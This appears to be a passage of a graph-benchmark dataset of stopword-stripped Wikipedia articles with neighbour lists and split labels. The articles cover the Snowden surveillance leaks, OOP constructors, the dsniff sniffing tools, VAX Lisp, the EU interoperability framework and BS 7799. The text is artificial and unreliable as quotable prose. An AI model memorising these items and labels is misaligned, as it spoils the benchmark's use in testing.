code-name quantum insert gchq set fake website masquerading linkedin social website used professional networking part efforts install surveillance software computers telecommunications operator belgacom addition headquarters oil cartel opec infiltrated gchq well nsa bugged computers nine opec employees monitored general secretary opec three years gchq using automated monitoring system code-named royal concierge infiltrate reservation systems least 350 prestigious hotels many different parts world order target search analyze reservations detect diplomats government officials first tested 2010 aim royal concierge track travel plans diplomats often supplemented surveillance methods related human intelligence humint covert operations include wiretapping room telephones fax machines used targeted hotels well monitoring computers hooked hotel network november 2013 australian broadcasting corporation guardian revealed australian signals directorate dsd attempted listen private phone calls president indonesia wife indonesian foreign minister marty natalegawa confirmed president contacted ambassador canberra natalegawa said tapping indonesian politicians personal phones violates every single decent legal instrument think of—national indonesia national australia international well high-ranking indonesian politicians targeted dsd include carrying title 3g impact update classified presentation leaked snowden revealed attempts asd/dsd keep pace rollout 3g technology indonesia across southeast asia asd/dsd motto placed bottom page reads reveal secrets—protect secret deal approved british intelligence officials nsa storing analyzing internet email records uk citizens since 2007 nsa also proposed 2005 procedure spying citizens uk five-eyes nations alliance even partner government explicitly denied u.s. permission proposal partner countries must neither informed particular type surveillance procedure towards end november new york times released internal nsa report outlining agency efforts expand surveillance abilities five-page document asserts law united states kept needs nsa conduct mass surveillance golden age signals intelligence grounds optimism nsa words report titled sigint strategy 2012–2016 also said u.s. try influence global commercial encryption market commercial relationships emphasized need revolutionize analysis vast data collection radically increase operational impact november 23 2013 dutch newspaper nrc handelsblad reported netherlands targeted u.s. intelligence agencies immediate aftermath world war ii period surveillance lasted 1946 1968 also included interception communications european countries including belgium france west germany norway dutch newspaper also reported nsa infected 50,000 computer networks worldwide often covertly malicious spy software sometimes cooperation local authorities designed steal sensitive information according classified documents leaked snowden australian signals directorate asd formerly known defence signals directorate offered share intelligence information collected intelligence agencies ukusa agreement data shared foreign countries include bulk unselected unminimised metadata collected asd provided information condition australian citizens targeted time asd assessed unintentional collection metadata australian nationals viewed significant issue target later identified australian national asd required contacted ensure warrant could sought consideration given whether medical legal religious information would automatically treated differently types data however decision made agency would make determinations case-by-case basis leaked material specify asd collected intelligence information however section 7 intelligence services act 2001 commonwealth states asd role ... obtain intelligence capabilities intentions activities people organisations outside australia ... possible asd metadata intelligence holdings focused foreign intelligence collection within bounds australian law washington post revealed nsa tracking locations mobile phones world tapping cables connect mobile networks globally serve u.s. cellphones well foreign ones process nsa collects five billion records phone locations daily basis enables nsa analysts map cellphone owners relationships correlating patterns movement time thousands millions phone users cross paths washington post also reported gchq nsa make use location data advertising tracking files generated normal internet browsing cookies operated google known pref pinpoint targets government hacking bolster surveillance norwegian intelligence service nis cooperates nsa gained access russian targets kola peninsula civilian targets general nis provides information nsa politicians energy armament top secret memo nsa lists following years milestones norway–united states america sigint agreement norus agreement nsa considers nis one reliable partners agencies also cooperate crack encryption systems mutual targets according nsa norway made objections requests nis december 5 sveriges television reported national defence radio establishment fra conducting clandestine surveillance operation sweden targeting internal politics russia operation conducted behalf nsa receiving data handed fra swedish-american surveillance operation also targeted russian energy interests well baltic states part ukusa agreement secret treaty signed 1954 sweden united states united kingdom canada australia new zealand regarding collaboration intelligence sharing result snowden disclosures notion swedish neutrality international politics called question internal document dating year 2006 nsa acknowledged relationship sweden protected top secret level nation political neutrality specific details sweden cooperation members ukusa agreement include according documents leaked snowden special source operations nsa sharing information containing logins cookies googleprefid tailored access operations division nsa well britain gchq agency 2010 g-20 toronto summit u.s. embassy ottawa transformed security command post six-day spying operation conducted nsa closely coordinated communications security establishment canada csec goal spying operation among others obtain information international development banking reform counter trade protectionism support u.s. policy goals behalf nsa csec set covert spying posts 20 countries around world italy special collection service nsa maintains two separate surveillance posts rome milan according secret nsa memo dated september 2010 italian embassy washington d.c. targeted two spy operations nsa due concerns terrorist criminal networks may secretly communicating via computer games nsa gchq cia fbi conducting surveillance scooping data networks many online games including massively multiplayer online role-playing games mmorpgs world warcraft well virtual worlds second life xbox gaming console nsa cracked commonly used cellphone encryption technology a5/1 according classified document leaked snowden agency process encrypted a5/1 even acquired encryption key addition nsa uses various types cellphone infrastructure links carrier networks determine location cellphone user tracked visitor location registers us district court judge district columbia richard leon declared december 16 2013 mass collection metadata americans telephone records national security agency probably violates fourth amendment prohibition unreasonable searches seizures leon granted request preliminary injunction blocks collection phone data two private plaintiffs larry klayman conservative lawyer charles strange father cryptologist killed afghanistan helicopter shot 2011 ordered government destroy records gathered judge stayed action ruling pending government appeal recognizing 68-page opinion significant national security interests stake case novelty constitutional issues however federal judge william h. pauley iii new york city ruled u.s. government global telephone data-gathering system needed thwart potential terrorist attacks work everyone calls swept u.s. district judge pauley also ruled congress legally set program violate anyone constitutional rights judge also concluded telephone data swept nsa belong telephone users telephone companies ruled nsa obtains data telephone companies probes find links callers potential terrorists use data even search fourth amendment also concluded controlling precedent smith v. maryland smith bedrock holding individual legitimate expectation privacy information provided third parties judge pauley wrote american civil liberties union declared january 2 2012 appeal judge pauley ruling nsa bulk phone record collection legal government legitimate interest tracking associations suspected terrorists tracking associations require government subject every citizen permanent surveillance deputy aclu legal director jameel jaffer said statement recent years american british intelligence agencies conducted surveillance 1,100 targets including office israeli prime minister heads international aid organizations foreign energy companies european union official involved antitrust battles american technology businesses catalog high-tech gadgets software developed nsa tailored access operations tao leaked german news magazine der spiegel dating 2008 catalog revealed existence special gadgets modified capture computer screenshots usb flash drives secretly fitted radio transmitters broadcast stolen data airwaves fake base stations intended intercept mobile phone signals well many secret devices software implants listed tailored access operations tao division nsa intercepted shipping deliveries computers laptops order install spyware physical implants electronic gadgets done close cooperation fbi cia nsa officials responded spiegel reports statement said tailored access operations unique national asset front lines enabling nsa defend nation allies tao work centred computer network exploitation support foreign intelligence collection separate disclosure unrelated snowden french trésor public runs certificate authority found issued fake certificates impersonating google order facilitate spying french government employees via man-in-the-middle attacks nsa working build powerful quantum computer capable breaking types encryption effort part us 79.7 million research program known penetrating hard targets involves extensive research carried large shielded rooms known faraday cages designed prevent electromagnetic radiation entering leaving currently nsa close producing basic building blocks allow agency gain complete quantum control two semiconductor qubits quantum computer successfully built would enable nsa unlock encryption protects data held banks credit card companies retailers brokerages governments health care providers according new york times nsa monitoring approximately 100,000 computers worldwide spy software named quantum quantum enables nsa conduct surveillance computers one hand also create digital highway launching cyberattacks hand among targets chinese russian military also trade institutions within european union nyt also reported nsa access alter computers connected internet secret technology use nsa since 2008 prerequisite physical insertion radio frequency hardware spy manufacturer unwitting user technology relies covert channel radio waves transmitted tiny circuit boards usb cards inserted surreptitiously computers cases sent briefcase-size relay station intelligence agencies set miles away target technology also transmit malware back infected computer channel 4 guardian revealed existence dishfire massive database nsa collects hundreds millions text messages daily basis gchq given full access database uses obtain personal information britons exploiting legal loophole day database receives stores following amounts data database supplemented analytical tool known prefer program processes sms messages extract types information including contacts missed call alerts privacy civil liberties oversight board report mass surveillance released january 23 2014 recommends end bulk telephone metadata i.e. bulk phone records – phone numbers dialed call times durations call content collection – collection program create special advocate involved cases fisa court judge release future past fisc decisions involve novel interpretations fisa significant questions law technology compliance according joint disclosure new york times guardian propublica nsa gchq begun working together collect store data dozens smartphone application software 2007 latest 2008 gchq report leaked snowden asserts anyone using google maps smartphone working support gchq system nsa gchq traded recipes various purposes grabbing location data journey plans made target uses google maps vacuuming address books buddy lists phone logs geographic data embedded photos posted mobile versions numerous social networks facebook flickr linkedin twitter services separate 20-page report dated 2012 gchq cited popular smartphone game angry birds example application could used extract user data taken together forms data collection would allow agencies collect vital information user life including home country current location geolocation age gender zip code marital status income ethnicity sexual orientation education level number children etc gchq document dated august 2012 provided details squeaky dolphin surveillance program enables gchq conduct broad real-time monitoring various social media features social media traffic youtube video views like button facebook blogspot/blogger visits without knowledge consent companies providing social media features agency squeaky dolphin program collect analyze utilize youtube facebook blogger data specific situations real time analysis purposes program also collects addresses billions videos watched daily well user information analysis purposes 2009 united nations climate change conference copenhagen nsa five eyes partners monitored communications delegates numerous countries done give policymakers negotiating advantage communications security establishment canada csec tracking canadian air passengers via free wi-fi services major canadian airport passengers exited airport terminal continued tracked showed wi-fi locations across canada csec document dated may 2012 agency described gained access two communications systems 300,000 users order pinpoint specific imaginary target operation executed behalf nsa trial run test new technology capable tracking target makes occasional forays cities/regions technology subsequently shared canada five eyes partners – australia new zealand britain united states according research süddeutsche zeitung tv network ndr mobile phone former german chancellor gerhard schröder monitored 2002 onwards reportedly government opposition military intervention iraq source latest information document leaked edward snowden document containing information national sigint requirement list nsrl previously interpreted referring angela merkel mobile however süddeutsche zeitung ndr claim confirmation nsa insiders surveillance authorisation pertains individual political post – 2002 still held schröder according research two media outlets schröder placed number 388 list contains names persons institutions put surveillance nsa gchq launched cyber-attack activist network anonymous using denial-of-service attack dos shut chatroom frequented network members spy attack dubbed rolling thunder conducted gchq unit known joint threat research intelligence group jtrig unit successfully uncovered true identities several anonymous members nsa section 215 bulk telephony metadata program seeks stockpile records calls made u.s. collecting less 30 percent americans call records inability keep pace explosion cellphone use according washington post controversial program permits nsa warrant granted secret foreign intelligence surveillance court record numbers length location every call participating carriers intercept reported u.s. government using primarily nsa surveillance target people drone strikes overseas report intercept author detail flawed methods used locate targets lethal drone strikes resulting deaths innocent people according washington post nsa analysts collectors i.e nsa personnel controls electronic surveillance equipment use nsa sophisticated surveillance capabilities track individual targets geographically real time drones tactical units aimed weaponry targets take unnamed us law firm reported mayer brown targeted australia asd according snowden documents asd offered hand intercepted communications nsa allowed government authorities able continue cover talks providing highly useful intelligence interested us customers nsa gchq documents revealed anti-secrecy organization wikileaks activist groups targeted government surveillance criminal prosecution particular ip addresses visitors wikileaks collected real time us government urged allies file criminal charges founder wikileaks julian assange due organization publication afghanistan war logs wikileaks organization designated malicious foreign actor quoting unnamed nsa official germany bild sonntag reported whilst president obama order stop spying merkel obeyed focus shifted bugging leading government business figures including interior minister thomas de maiziere close confidant merkel caitlin hayden security adviser president obama quoted newspaper report saying us made clear gathers intelligence exactly way states intercept reveals government agencies infiltrating online communities engaging false flag operations discredit targets among people nothing terrorism national security threats two main tactics currently used injection sorts false material onto internet order destroy reputation targets use social sciences techniques manipulate online discourse activism generate outcomes considers desirable guardian reported britain surveillance agency gchq aid national security agency intercepted stored webcam images millions internet users suspected wrongdoing surveillance program codenamed optic nerve collected still images yahoo webcam chats one image every five minutes bulk saved agency databases agency discovered surprising number people use webcam conversations show intimate parts body person estimating 3 11 yahoo webcam imagery harvested gchq contains undesirable nudity nsa built infrastructure enables covertly hack computers mass scale using automated systems reduce level human oversight process nsa relies automated system codenamed turbine essence enables automated management control large network implants form remotely transmitted malware selected individual computer devices bulk tens thousands devices quoted intercept turbine designed allow current implant network scale large size millions implants creating system automated control implants groups instead individually nsa shared many files use implants counterparts so-called five eyes surveillance alliance – united kingdom canada new zealand australia among things due turbine control implants nsa capable turbine implants linked relies upon large network clandestine surveillance sensors nsa installed locations across world including agency headquarters maryland eavesdropping bases used agency misawa japan menwith hill england codenamed turmoil sensors operate sort high-tech surveillance dragnet monitoring packets data sent across internet turbine implants exfiltrate data infected computer systems turmoil sensors automatically identify data return nsa analysis targets communicating turmoil system used send alerts tips turbine enabling initiation malware attack identify surveillance targets nsa uses series data selectors flow across internet cables selectors include email addresses ip addresses unique cookies containing username identifying information sent user computer websites google facebook hotmail yahoo twitter unique google advertising cookies track browsing habits unique encryption key fingerprints traced specific user computer ids sent across internet windows computer crashes updates cia accused u.s. senate intelligence committee chairwoman dianne feinstein spying stand-alone computer network established committee investigation allegations cia abuse george w. bush-era detention interrogation program voice interception program codenamed mystic began 2009 along retro short retrospective retrieval retro voice audio recording buffer allows retrieval captured content 30 days past mystic program capable recording 100 percent foreign country telephone calls enabling nsa rewind review conversations 30 days relating metadata capability store 30 days recorded conversations mystic enables nsa pull instant history person movements associates plans march 21 le monde published slides internal presentation communications security establishment canada attributed piece malicious software french intelligence csec presentation concluded list malware victims matched french intelligence priorities found french cultural reference malware code including name babar popular french children character developer name titi french telecommunications corporation orange s.a. shares call data french intelligence agency dgse hands intercepted data gchq nsa spied chinese technology company huawei huawei leading manufacturer smartphones tablets mobile phone infrastructure wlan routers installs fiber optic cable according der spiegel kind technology … decisive nsa battle data supremacy nsa operation named shotgiant able access huawei email archive source code huawei communications products us government longstanding concerns huawei may independent people liberation army chinese government might use equipment manufactured huawei conduct cyberespionage cyberwarfare goals nsa operation assess relationship huawei pla learn chinese government plans use information huawei spy huawei customers including iran afghanistan pakistan kenya cuba former chinese president hu jintao chinese trade ministry banks well telecommunications companies also targeted nsa intercept published document nsa employee discussing build database ip addresses webmail facebook accounts associated system administrators nsa gain access networks systems administer end march 2014 der spiegel intercept published based series classified files archive provided reporters nsa whistleblower edward snowden articles related espionage efforts gchq nsa germany british gchq targeted three german internet firms information internet traffic passing internet exchange points important customers german internet providers technology suppliers well future technical trends business sector company employees nsa granted foreign intelligence surveillance court authority blanket surveillance germany people institutions regardless whether affected suspected committed offense without individualized court order specifying march 7 2013 addition germany chancellor angela merkel listed surveillance search machine database named nymrod along 121 others foreign leaders intercept wrote nsa uses nymrod system 'find information relating targets would otherwise tough track according internal nsa documents nymrod sifts secret reports based intercepted communications well full transcripts faxes phone calls communications collected computer systems 300 'cites merkel listed available intelligence reports transcripts nsa operatives read towards end april edward snowden said united states surveillance agencies spy americans anyone else world contrary anything said government point article published ars technica shows nsa tailored access operations tao employees intercepting cisco router intercept wikileaks revealed information countries communications collected part mystic surveillance program may 19 intercept reported nsa recording archiving nearly every cell phone conversation bahamas system called somalget subprogram mystic mass surveillance occurring without bahamian government permission aside bahamas intercept reported nsa interception cell phone metadata kenya philippines mexico fifth country name due credible concerns could lead increased violence wikileaks released statement may 23 claiming afghanistan unnamed nation statement responding revelations nsa said implication nsa foreign intelligence collection arbitrary unconstrained false global surveillance operations nsa exploits flood images included emails text messages social media videoconferences communications harvest millions images images used nsa sophisticated facial recognition programs track suspected terrorists intelligence targets vodafone revealed secret wires allowed government agencies direct access networks access require warrants direct access wire often equipment locked room six countries vodafone operates law requires telecommunication companies install access allows governments vodafone name countries case governments retaliated imprisoning staff shami chakrabarti liberty said governments access phone calls flick switch unprecedented terrifying snowden revealed internet already treated fair game bluster well wearing pretty thin – analogue laws need digital overhaul vodafone published first law enforcement disclosure report june 6 2014 vodafone group privacy officer stephen deadman said pipes exist direct access model exists making call end direct access means government agencies obtaining people communication data without official warrant external visibility receive demand push back agency fact government issue piece paper important constraint powers used gus hosein director privacy international said never thought telcos would complicit brave step vodafone hopefully telcos become brave disclosure need braver fighting back illegal requests laws above-top-secret documentation covert surveillance program named overseas processing centre 1 opc-1 codenamed circuit gchq published register based documents leaked edward snowden gchq taps undersea fiber optic cables via secret spy bases near strait hormuz yemen bt vodafone implicated danish newspaper dagbladet information intercept revealed june 19 2014 nsa mass surveillance program codenamed rampart-a rampart-a 'third party countries tap fiber optic cables carrying majority world electronic communications secretly allowing nsa install surveillance equipment fiber-optic cables foreign partners nsa turn massive amounts data like content phone calls faxes e-mails internet chats data virtual private networks calls made using voice ip software like skype nsa return partners receive access nsa sophisticated surveillance equipment spy mass data flows territory among partners participating nsa mass surveillance program denmark germany week july 4 31-year-old male employee germany intelligence service bnd arrested suspicion spying united states employee suspected spying german parliamentary committee investigating nsa spying scandal former nsa official whistleblower william binney spoke centre investigative journalism conference london according binney least 80 audio calls metadata recorded stored us nsa lies stores also stated majority fiber optic cables run u.s. accident allows us view communication coming washington post released review cache provided snowden containing roughly 160,000 text messages e-mails intercepted nsa 2009 2012 newspaper concluded nine ten account holders whose conversations recorded agency intended surveillance targets caught net agency cast somebody else analysis post also noted many account holders americans july 9 soldier working within germany federal ministry defence bmvg fell suspicion spying united states result july 4 case one german government expelled cia station chief germany july 17 july 18 former state department official john tye released editorial washington post highlighting concerns data collection executive order 12333 tye concerns rooted classified material access state department though publicly released classified materials intercept reported nsa secretly providing data nearly two dozen u.s. government agencies 'google-like search engine called icreach database intercept reported accessible domestic law enforcement agencies including fbi drug enforcement administration built contain 850 billion metadata records phone calls emails cellphone locations text messages based documents obtained snowden intercept reported nsa gchq broken internal computer network gemalto stolen encryption keys used sim cards later 2010. company world largest manufacturer sim cards making two billion cards year keys intelligence agencies could eavesdrop cell phones without knowledge mobile phone operators foreign governments new zealand herald partnership intercept revealed new zealand government used xkeyscore spy candidates position world trade organization director general also members solomon islands government january 2015 dea revealed collecting metadata records telephone calls made americans 116 countries linked drug trafficking dea program separate telephony metadata programs run nsa april usa today reported dea data collection program began 1992 included telephone calls united states canada mexico current former dea officials described program precursor nsa similar programs dea said program suspended september 2013 review nsa programs ultimately terminated snowden provided journalists intercept gchq documents regarding another secret program karma police calling world biggest data mining operation formed create profiles every visible internet user browsing habits 2009 stored 1.1 trillion web browsing sessions 2012 recording 50 billion sessions per day 2017 disclosures wikileaks dubbed vault7 disclosure provided impetus creation social movements mass surveillance restore fourth actions like stop watching us day fight back legal front electronic frontier foundation joined coalition diverse groups filing suit nsa several human rights organizations urged obama administration prosecute protect whistleblower snowden amnesty international human rights watch transparency international index censorship among others economic front several consumer surveys registered drop online shopping banking activity result snowden revelations domestically president barack obama claimed spying americans white house press secretary jay carney asserted surveillance programs revealed snowden authorized congress international front u.s. attorney general eric holder stated target even foreign persons overseas without valid foreign intelligence purpose prime minister david cameron warned journalists n't demonstrate social responsibility difficult government stand back act deputy prime minister nick clegg emphasized media absolutely defend principle secrecy intelligence agencies foreign secretary william hague claimed take great care balance individual privacy duty safeguard public uk national security hague defended five eyes alliance reiterated british-u.s. intelligence relationship must endangered saved many lives former prime minister tony abbott stated every australian governmental agency every australian official home abroad operates accordance law abbott criticized australian broadcasting corporation unpatriotic due reporting documents provided snowden abbott described traitor foreign minister julie bishop also denounced snowden traitor accused unprecedented treachery bishop defended five eyes alliance reiterated australian–u.s intelligence relationship must endangered saves lives july 2013 chancellor angela merkel defended surveillance practices nsa described united states truest ally throughout decades nsa surveillance merkel revealed however chancellor compared nsa stasi according guardian berlin using controversy nsa spying leverage enter exclusive five eyes alliance interior minister hans-peter friedrich stated americans take data privacy concerns seriously testifying german parliament friedrich defended nsa surveillance cited five terrorist plots german soil prevented nsa however april 2014 another german interior minister criticized united states failing provide sufficient assurances germany reined spying tactics thomas de maiziere close ally merkel told der spiegel u.s. intelligence methods may justified large extent security needs tactics excessive over-the-top minister foreign affairs carl bildt defended fra described surveillance practices national necessity minister defence karin enström said sweden intelligence exchange countries critical security intelligence operations occur within framework clear legislation strict controls parliamentary oversight interior minister ronald plasterk apologized incorrectly claiming nsa collected 1.8 million records metadata netherlands plasterk acknowledged fact dutch intelligence services collected records transferred nsa danish prime minister helle thorning-schmidt praised american intelligence agencies claiming prevented terrorist attacks denmark expressed personal belief danish people grateful americans surveillance later claimed danish authorities basis assuming american intelligence agencies performed illegal spying activities towards denmark danish interests july 2013 german government announced extensive review germany intelligence services august 2013 u.s. government announced extensive review u.s. intelligence services october 2013 british government announced extensive review british intelligence services december 2013 canadian government announced extensive review canada intelligence services january 2014 u.s. president barack obama said sensational way disclosures come often shed heat light critics sean wilentz claimed nsa acted far responsibly claims made leakers publicized press wilentz view leakers gone far beyond justifiably blowing whistle abusive programs addition alarmism u.s. domestic surveillance many snowden documents released thus far nothing whatsoever domestic surveillance edward lucas former moscow bureau chief economist agreed asserting snowden revelations neatly suspiciously fits interests one country russia citing masha gessen statement russian propaganda machine gotten much mileage us citizen since angela davis murder trial 1971 bob cesca objected new york times failing redact name nsa employee specific location al qaeda group targeted series slides paper made publicly available russian journalist andrei soldatov argued snowden revelations negative consequences internet freedom russia russian authorities increased surveillance regulation pretext protecting privacy russian users snowden name invoked russian legislators supported measures forcing platforms google facebook twitter gmail youtube locate servers russian soil install sorm black boxes servers russian authorities could control soldatov also contended result disclosures international support national governments take powers organizations involved coordinating internet global architectures grown could lead balkanization internet restricted free access information montevideo statement future internet cooperation issued october 2013 icann organizations warned internet fragmentation national level expressed strong concern undermining trust confidence internet users globally due recent revelations late 2014 freedom house said ome states using revelations widespread surveillance u.s. national security agency nsa excuse augment monitoring capabilities frequently little oversight often aimed political opposition human rights activists
[ 9732, 517, 3088, 9233, 4118, 8726, 3629, 8750, 1589, 1083, 5180, 10303, 11335, 2634, 2636, 7759, 3154, 8276, 91, 5216, 2148, 10859, 5229, 10867, 5749, 3703, 1169, 2208, 4771, 8356, 1189, 9900, 10417, 10935, 7354, 5308, 6343, 6344, 7887, 2...
Test
7,894
9
Constructor_(object-oriented_programming):constructor object-oriented programming class-based object-oriented programming constructor abbreviation ctor special type subroutine called create object prepares new object use often accepting arguments constructor uses set required member variables constructor resembles instance method differs method explicit return type implicitly inherited usually different rules scope modifiers constructors often name declaring class task initializing object data members establishing invariant class failing invariant invalid properly written constructor leaves resulting object valid state immutable objects must initialized constructor languages allow overloading constructor one constructor class differing parameters languages take consideration special types constructors constructors concretely use single class create objects return new instance class abstracted factories also create objects various ways using multiple classes different allocation schemes object pool constructors take least one argument termed parameterized constructors.when object declared parameterized constructor initial values passed arguments constructor function normal way object declaration may work constructors called explicitly implicitly method calling constructor implicitly also called shorthand method.if want initialize fields class values use parameterized constructor programmer supply constructor instantiable class java compiler inserts default constructor code behalf constructor known default constructor would find source code java file would inserted code compilation exists .class file.the behavior default constructor language dependent may initialize data members zero values may nothing all.in java default constructor refer nullary constructor automatically generated compiler constructors defined class absence programmer-defined constructors e.g java.the default constructor implicitly calls superclass nullary constructor executes empty body fields left initial value 0 integer types 0.0 floating-point types false boolean type null reference types like c++ java also supports copy constructor unlike c++ java ’ create default copy constructor ’ write copy constructors define actions performed compiler copying class objects copy constructor one formal parameter type class parameter may reference object used create copy existing object class even though classes counts conversion constructor copy constructors usually abbreviated copy ctor cctor nothing class constructors used .net using abbreviation conversion constructors provide means compiler implicitly create object belonging one class based object different type constructors usually invoked implicitly convert arguments operands appropriate type may also called explicitly c++ move constructors take value reference object class used implement ownership transfer parameter object resources java c vb .net constructor creates reference type objects special memory structure called heap value types int double etc created sequential structure called stack vb .net c also allow use new operator create value type objects value type objects created stack regardless whether operator used c++ objects created stack constructor invoked without new operator created heap constructor invoked new operator stack objects deleted implicitly go scope heap objects must deleted implicitly destructor explicitly using delete operator java constructors differ methods java constructors perform following tasks following order java permit users call one constructor another constructor using codice_21 keyword codice_21 must first statement java provides access superclass constructor codice_23 keyword constructor taking zero number arguments called no-arguments no-arg constructor es6 javascript direct constructors like many programming languages written instantiated equivalent es6 creating function instantiates object instantiated way visual basic .net constructors use method declaration name codice_4 example c constructor c static constructor static data initializer static constructors also called class constructors since actual method generated name .cctor often also called cctors static constructors allow complex static variable initialization static constructors called implicitly class first accessed call class static constructor call triggers static constructor execution static constructors thread safe implement singleton pattern used generic programming class static constructors called every new generic instantiation one per type static variables instantiated well c++ name constructor name class returns nothing parameters like member function constructor functions usually declared public section also declared protected private sections user wants restrict access constructor two parts first initializer list follows parameter list method body starts colon entries comma-separated initializer list required offers opportunity provide values data members avoid separate assignment statements initializer list required const reference type data members members parameterless constructor logic assignments occur according order data members declared even order initializer list different second part body normal method body enclosed curly brackets c++ allows one constructor constructors must different parameters additionally constructors contain parameters given default values must adhere restriction parameters given default value situation matters default constructor constructor base class base classes also called derived class constructor functions inherited addresses referenced memory allocation required new delete operators called implicitly copy constructor parameter type passed const reference example vector const vector rhs provided explicitly compiler uses copy constructor member variable simply copies values case primitive types default implementation efficient class dynamically allocated members handles resources lead double calls delete double release resources upon destruction example invocations returning objects functions passing objects value objects copy constructor called implicitly unless return value optimization applies c++ implicitly generates default copy constructor call copy constructors base classes member variables unless programmer provides one explicitly deletes copy constructor prevent cloning one base classes member variables copy constructor deleted accessible private cases calling customized copy constructor e.g reference counting deep copy pointers also require customizing destructor copy assignment operator commonly referred rule three f constructor include codice_25 codice_26 statements defined class codice_25 statements define private fields codice_26 statements execute code additional constructors defined using codice_17 keyword eiffel routines initialize new objects called creation procedures creation procedures following traits although object creation involves subtleties creation attribute typical declaration codice_30 expressed creation instruction codice_31 consists following sequence steps first snippet class codice_35 defined procedure codice_33 coded keyword codice_37 keyword codice_38 introduces list procedures used initialize instances case list includes codice_39 procedure empty implementation inherited class codice_40 codice_33 procedure coded within class second snippet class client codice_35 declarations codice_43 codice_44 type codice_35 procedural code codice_43 created origin 0.0 0.0 creation procedure specified procedure codice_39 inherited class codice_40 used line could coded codice_49 procedures named creation procedures used instruction codice_38 keyword next creation instruction codice_44 providing initial values codice_44 coordinates third instruction makes ordinary instance call codice_33 procedure reinitialize instance attached codice_44 different values cfml uses method named 'codice_14 constructor method cheese.cfc create instance cheese since coldfusion 10 cfml also supported specifying name constructor method object pascal constructor similar factory method syntactic difference regular methods keyword codice_11 front name instead codice_57 codice_58 name though convention codice_12 prefix codice_60 creating instance class works like calling static method class codice_61 perl programming language version 5 default constructors factory methods methods create return object concretely meaning create return blessed reference typical object reference hash though rarely references types used convention constructor named new though allowed name otherwise multiple constructors example person class may constructor named new well constructor new_from_file reads file person attributes new_from_person uses another person object template moose object system perl boilerplate left default new created attributes specified well whether set reset required addition extra constructor functionality included build method moose generated constructor call checked arguments buildargs method specified handle constructor arguments hashref key value form cases person class instiated like perl 6 even boilerplate left given default new method inherited attributes specified well whether set reset required addition extra constructor functionality included build method get called allow custom initialization tweak method specified post-process attributes already implicitly initialized person class instantiated like alternatively named parameters specified using colon-pair syntax perl 6 set variables names identical named parameters use shortcut use name variable named parameter php version 5 constructor method named codice_62 notice double underscore keyword codice_17 automatically calls creating object usually used automatically perform initializations property initializations constructors also accept arguments case codice_17 statement written also need send constructor arguments parameters python constructors defined one codice_5 codice_6 methods new instance created calling class function calls codice_5 codice_6 methods constructor method defined class next one found class method resolution order called typical case codice_6 method need defined common exception immutable objects classes normally act factories new instances class callable object like function call constructor calling class returns instance class however codice_5 method permitted return something instance class specialised purposes case codice_6 invoked ruby constructors created defining method called codice_72 method executed initialize new instance ocaml one constructor parameters defined right class name used initialize instance variables accessible throughout class anonymous hidden method called codice_73 allows evaluate expression immediately object built
[ 2048, 3076, 4101, 3462, 8582, 9482, 1931, 6414, 10510, 6160, 5521, 9490, 3736, 155, 9245, 5796, 5677, 5806, 9008, 7219, 3765, 7479, 2617, 10043, 10555, 10684, 1470, 963, 5316, 8644, 5961, 1610, 1611, 9804, 333, 8397, 11212, 5330, 11219, 5...
Test
7,895
4
DSniff:dsniff dsniff set password sniffing network traffic analysis tools written security researcher startup founder dug song parse different application protocols extract relevant information dsniff filesnarf mailsnarf msgsnarf urlsnarf webspy passively monitor network interesting data passwords e-mail files etc. arpspoof dnsspoof macof facilitate interception network traffic normally unavailable attacker e.g. due layer-2 switching sshmitm webmitm implement active man-in-the-middle attacks redirected ssh https sessions exploiting weak bindings ad-hoc pki applications sniff usernames passwords web pages visited contents email etc dsniff name implies network sniffer also used disrupt normal behavior switched networks cause network traffic hosts network segment visible traffic involving host dsniff running handles ftp telnet smtp http pop poppass nntp imap snmp ldap rlogin rip ospf pptp ms-chap nfs vrrp yp/nis socks x11 cvs irc aim icq napster postgresql meeting maker citrix ica symantec pc anywhere nai sniffer microsoft smb oracle sql*net sybase microsoft sql protocols name dsniff refers package well included tool dsniff tool decodes passwords sent cleartext across switched unswitched ethernet network man page explains song wrote dsniff honest intentions audit network demonstrate insecurity cleartext network protocols requests please abuse software files configured dsniff folder /etc/dsniff/ man page dsniff explains flags learn using dsniff explore linux man page list descriptions various dsniff programs text belong dsniff “ readme ” written author dug song
[ 1668, 3218, 5397, 11030, 10905, 5405, 1064, 1580, 10924, 7983, 9909, 8504, 3133, 6083, 7364, 842, 9939, 8539, 9440, 10340, 5990, 11112, 7411, 2292, 6013, 4863 ]
None
7,896
9
Vax_Common_Lisp:vax common lisp vax lisp implementation common lisp vms ultrix 32-bit vaxs first common lisp written non-lisp machines initially boot-strapped carnegie mellon university spice lisp recompiling output vax machine instruction use large vax stack original developers came cmu features included development never-released v4.0 product sold lucid inc
[ 4865, 2438, 9865, 8973, 2062, 9877, 4122, 1448, 9128, 4779, 5040, 8883, 6969, 7867, 8258, 8771, 4550, 11083, 8908, 1613, 9299, 11604, 1365, 2392, 6493, 3176, 2667, 4606 ]
None
7,897
3
European_Interoperability_Framework:european interoperability framework european interoperability framework eif set recommendations specify administrations businesses citizens communicate within european union across member state borders eif 1.0 issued interoperable delivery european egovernment services public administrations businesses citizens programme idabc eif continues new isa programme replaced idabc programme 31 december 2009 eif effect enterprise architecture framework targeted largest possible scale designed promote integration spanning multiple sovereign nation states specifically eu member states examples enterprise architecture frameworks designed operate different levels scale see also alternative enterprise architecture frameworks eif version 1.0 published november 2004 non-technology obstacles stand way greater eif adoption include facts eu member states currently differ widely terms draft version 2 eif subject political debate main technology/commercial issues relate role lobbying proprietary software eif 2 adopted european commission annex ii eif european interoperability framework communication “ towards interoperability european public services ” 16 december 2010 23 march 2017 isa2 programme released new version eif version dropped version numbers simply called 'new eif include policy changes past years
[ 11164, 2948, 5005, 3375 ]
None
7,898
4
BS_7799:bs 7799 bs 7799 standard originally published bsi group bsi 1995 written united kingdom government department trade industry dti consisted several parts first part containing best practices information security management revised 1998 lengthy discussion worldwide standards bodies eventually adopted iso iso/iec 17799 information technology code practice information security management 2000 iso/iec 17799 revised june 2005 finally incorporated iso 27000 series standards iso/iec 27002 july 2007 second part bs 7799 first published bsi 1999 known bs 7799 part 2 titled information security management systems specification guidance use bs 7799-2 focused implement information security management system isms referring information security management structure controls identified bs 7799-2 later became iso/iec 27001 2002 version bs 7799-2 introduced plan-do-check-act pdca deming quality assurance model aligning quality standards iso 9000 bs 7799 part 2 adopted iso iso/iec 27001 november 2005 bs 7799 part 3 published 2005 covering risk analysis management aligns iso/iec 27001
[ 3552, 9184, 3447, 6360, 383 ]
None
7,899
4
